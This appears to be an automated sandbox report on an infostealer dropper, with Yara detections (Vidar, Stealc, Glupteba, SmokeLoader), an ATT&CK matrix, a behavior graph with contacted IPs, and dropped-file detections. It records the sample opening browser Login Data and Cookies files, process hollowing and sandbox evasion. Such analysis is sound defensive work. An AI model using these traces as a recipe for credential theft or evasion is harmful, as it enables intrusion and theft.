interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: BroomSetup.exe, 0000001B.00000002.3339978515.000000000041C000.00000040.00000001.01000000.00000019.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009BFE51 cpuid 17_2_009BFE51
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: GetLocaleInfoA,14_2_0040520C
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: GetLocaleInfoA,14_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: GetLocaleInfoA,15_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: GetLocaleInfoA,15_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpQueries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpQueries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpQueries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,15_2_004585C8
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004026C4 GetSystemTime,14_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045559C GetUserNameA,15_2_0045559C
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00405CF4 GetVersionExA,14_2_00405CF4
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Glupteba
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
                    Yara detected Mars stealer
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: simplewebbuilder.exe PID: 6628, type: MEMORYSTR
                    Yara detected Stealc
                    Source: Yara matchFile source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Glupteba
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
                    Yara detected Mars stealer
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: simplewebbuilder.exe PID: 6628, type: MEMORYSTR
                    Yara detected Stealc
                    Source: Yara matchFile source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1307A sqlite3_transfer_bindings,22_2_61E1307A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D5E6 sqlite3_bind_int64,22_2_61E2D5E6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D595 sqlite3_bind_double,22_2_61E2D595
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E0B431 sqlite3_clear_bindings,22_2_61E0B431
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E037F3 sqlite3_value_frombind,22_2_61E037F3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D781 sqlite3_bind_zeroblob64,22_2_61E2D781
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D714 sqlite3_bind_zeroblob,22_2_61E2D714
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D68C sqlite3_bind_pointer,22_2_61E2D68C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D65B sqlite3_bind_null,22_2_61E2D65B
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D635 sqlite3_bind_int,22_2_61E2D635
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D9B0 sqlite3_bind_value,22_2_61E2D9B0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D981 sqlite3_bind_text16,22_2_61E2D981
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D945 sqlite3_bind_text64,22_2_61E2D945
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D916 sqlite3_bind_text,22_2_61E2D916
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D8E7 sqlite3_bind_blob64,22_2_61E2D8E7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E038CA sqlite3_bind_parameter_count,22_2_61E038CA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E158CA sqlite3_bind_parameter_index,22_2_61E158CA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E038DC sqlite3_bind_parameter_name,22_2_61E038DC
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2D8B8 sqlite3_bind_blob,22_2_61E2D8B8

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		Valid Accounts13
                    Native API                    		11
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Shared Modules                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		4
                    Windows Service                    		1
                    Access Token Manipulation                    		21
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Clipboard Data                    		1
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		2
                    Registry Run Keys / Startup Folder                    		4
                    Windows Service                    		21
                    Software Packing                    		NTDS58
                    System Information Discovery                    		Distributed Component Object ModelInput Capture1
                    Proxy                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd1
                    Bootkit                    		513
                    Process Injection                    		1
                    Timestomp                    		LSA Secrets1
                    Query Registry                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		Cached Domain Credentials551
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Masquerading                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                    Virtualization/Sandbox Evasion                    		Proc Filesystem251
                    Virtualization/Sandbox Evasion                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow11
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron513
                    Process Injection                    		Network Sniffing3
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Bootkit                    		Input Capture1
                    Remote System Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                    System Network Configuration Discovery                    		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1407288 Sample: file.exe Startdate: 12/03/2024 Architecture: WINDOWS Score: 100 124 Multi AV Scanner detection for domain / URL 2->124 126 Found malware configuration 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 21 other signatures 2->130 9 file.exe 14 2 2->9         started        14 svchost.exe 2->14         started        16 cmd.exe 2->16         started        18 3 other processes 2->18 process3 dnsIp4 118 14.161.17.4 VNPT-AS-VNVNPTCorpVN Viet Nam 9->118 120 14.232.235.13 VNPT-AS-VNVNPTCorpVN Viet Nam 9->120 122 97 other IPs or domains 9->122 112 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 9->112 dropped 148 Writes to foreign memory regions 9->148 150 Sample uses process hollowing technique 9->150 152 Writes many files with high entropy 9->152 154 Injects a PE file into a foreign processes 9->154 20 InstallUtil.exe 15 291 9->20         started        25 CasPol.exe 9->25         started        27 InstallUtil.exe 9->27         started        29 WerFault.exe 9->29         started        31 WerFault.exe 14->31         started        33 conhost.exe 16->33         started        35 conhost.exe 18->35         started        37 conhost.exe 18->37         started        file5 signatures6 process7 dnsIp8 116 194.87.206.12 AS-REGRU Russian Federation 20->116 88 C:\Users\...\xzRRQmj1LpBxF1iTy72H1YWe.exe, PE32 20->88 dropped 90 C:\Users\...\vuP05YoHCo3Zp0Gv9gzt1k3R.exe, PE32 20->90 dropped 92 C:\Users\...\uYudt0flCl0e0fQZ8vnWLOhm.exe, PE32 20->92 dropped 94 221 other malicious files 20->94 dropped 142 Drops script or batch files to the startup folder 20->142 144 Creates HTML files with .exe extension (expired dropper behavior) 20->144 146 Writes many files with high entropy 20->146 39 JgqIdYSSt70LQLRUqfTzKJw8.exe 20->39         started        42 3cs4PKncIzTPVTZHP3GDsO8B.exe 20->42         started        44 Ca4kQMpVXP8DY5HQ8cbuvFmH.exe 20->44         started        47 18 other processes 20->47 file9 signatures10 process11 file12 96 C:\Users\...\JgqIdYSSt70LQLRUqfTzKJw8.tmp, PE32 39->96 dropped 49 JgqIdYSSt70LQLRUqfTzKJw8.tmp 39->49         started        98 C:\Users\user\AppData\Local\...\syncUpd.exe, PE32 42->98 dropped 100 C:\Users\user\AppData\Local\...\INetC.dll, PE32 42->100 dropped 102 C:\Users\user\AppData\...\BroomSetup.exe, PE32 42->102 dropped 52 syncUpd.exe 42->52         started        55 BroomSetup.exe 42->55         started        156 Detected unpacking (changes PE section rights) 44->156 158 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 44->158 160 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 44->160 170 2 other signatures 44->170 104 C:\Users\...\PvJ9KZy5kaC0ZzTLP46Ng6g6.tmp, PE32 47->104 dropped 106 C:\Users\...\jUzz7ezNBFbkGCxJO9DOH9dj.tmp, PE32 47->106 dropped 108 C:\Users\...\qvx2vm8LJ8TphvujtDcRyl5q.tmp, PE32 47->108 dropped 110 13 other malicious files 47->110 dropped 162 Detected unpacking (overwrites its own PE header) 47->162 164 Found Tor onion address 47->164 166 Maps a DLL or memory area into another process 47->166 168 Writes many files with high entropy 47->168 57 FNi4gQqkHn29EqnTv0rxfxe1.tmp 47->57         started        59 7odVnHyI6UBWlRBALo6WuNSW.exe 47->59         started        61 7odVnHyI6UBWlRBALo6WuNSW.exe 47->61         started        signatures13 process14 file15 70 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 49->70 dropped 72 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 49->72 dropped 74 C:\Users\user\AppData\...\unins000.exe (copy), PE32 49->74 dropped 86 14 other files (13 malicious) 49->86 dropped 63 simplewebbuilder.exe 49->63         started        66 simplewebbuilder.exe 49->66         started        132 Detected unpacking (changes PE section rights) 52->132 134 Detected unpacking (overwrites its own PE header) 52->134 136 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 52->136 138 Tries to harvest and steal browser information (history, passwords, etc) 52->138 140 Multi AV Scanner detection for dropped file 55->140 68 cmd.exe 55->68         started        76 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 57->76 dropped 78 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 57->78 dropped 80 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 57->80 dropped 82 Opera_installer_24031207530527645904.dll, PE32 59->82 dropped 84 Opera_installer_24031207531585744560.dll, PE32 61->84 dropped signatures16 process17 file18 114 C:\...\DirectSoundDriver 2.36.198.67.exe, PE32 63->114 dropped

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe34%VirustotalBrowse
                    file.exe100%AviraHEUR/AGEN.1313217
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe100%AviraHEUR/AGEN.1315065
                    C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe100%AviraHEUR/AGEN.1316657
                    C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe100%AviraHEUR/AGEN.1316657
                    C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe100%AviraHEUR/AGEN.1316657
                    C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe100%AviraHEUR/AGEN.1316657
                    C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exe100%Joe Sandbox ML
                    C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe100%Joe Sandbox ML
                    C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe37%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe37%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\BroomSetup.exe75%ReversingLabsWin32.Trojan.Znyonm
                    C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dll0%ReversingLabs
